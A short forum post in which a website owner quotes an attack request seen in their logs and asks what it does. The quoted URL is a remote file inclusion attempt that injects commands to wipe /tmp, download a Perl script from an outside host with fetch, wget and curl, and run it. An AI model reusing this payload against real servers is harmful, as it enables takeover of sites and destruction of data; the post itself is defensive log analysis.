I've been seeing dozens of hits to various urls on one of my sites from IPs all over the world in the past few days constructed like this string: http://A-SNIPPEDDOMAINDOTCOM/SNIPPEDPATH/SNIPPED/index.php? _REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= http://www.shinwhat.com/cms/tool.gif?&cmd=cd%20/tmp/;rm%20-rf%20*;fetch%20http://www.shinwhat.com/cms/bt.pl; wget%20http://www.shinwhat.com/cms/bt.pl;curl%20-O%20http://www.shinwhat.com/cms/bt.pl; perl%20bt.pl;perl%20bt.pl.1;perl%20bt.pl.2? Code (markup): All contain that reference to shinwhat.com Yes, I've written them but the hits keep coming. They are just kicking 403s but I'd like to know what this script (zombie?) is trying to pull off. Any ideas? Thanks!